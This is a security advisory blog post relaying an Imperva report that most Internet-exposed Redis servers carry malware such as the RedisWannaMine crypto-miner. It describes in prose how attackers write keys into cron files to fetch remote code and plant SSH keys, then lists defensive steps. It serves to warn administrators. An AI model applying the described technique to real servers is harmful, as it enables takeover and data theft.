LTS Secure Warning: Three-quarter of Open Redis servers infected with malware

Imperva research report shows, out of four Redis Servers three are infected with malware.

Redis, or REmote DIctionary Server, is an open source, widely popular data structure tool that can be used as an in-memory distributed database, message broker or cache. Since it is designed to be accessed inside trusted environments, it should not be exposed on the Internet.

In a recent development, it was observed that hackers are deploying dubbed RedisWannaMine, a new crypto-mining script on the targeted servers – both database and application.

Current report indicated massive malware campaign designed to target open radius servers, which has already compromised 75% of the Redis servers.

Technical Details

Researchers said that the attackers set a key/ value pair in the memory and then saves it to a file in the disk in a location that will force the file to run (e.g. /etc/crontabs, /var/spool/cron/crontab etc.). Attackers usually set values that include commands to download external remote resource and run it. Another popular type of command is adding SSH keys, so the attacker can remotely access the machine and take it over.

Report says Imperva users were attacked more than 75k times by 295 public Redis servers IPs.

Imperva now revealed that three-quarters of the open Redis servers accessible from the Internet (over port 6379) contain malicious sets of a key-value pair in the memory, indicating despite multiple warnings administrators continue to leave their servers vulnerable to hackers.

Impact

Report says a large amount of publicly available data has been compromised, attackers use private SSH keys to access to the servers, certificates that can be used to decrypt network traffic, PII, and more sensitive data.

Moreover, the attackers have now found using the compromised servers as a proxy to scan and find vulnerabilities, including SQL injection, cross-site scripting, and malicious file uploads, and remote code executions, in other websites.

Recommended Actions

  • Make sure you follow Redis Security notes, i.e.
    • Don’t expose your Redis to the internet.
    • If possible, apply authentication.
    • Don’t store sensitive data in clear text.
  • Monitor your Redis server to make sure it is not infected.
  • Monitor processes or CPU consumption to check if a crypto mining malware is running
  • Make sure you run Redis with the minimal privileges necessary.

Imperva has released a security advisory about Redis Servers on June 1, 2018.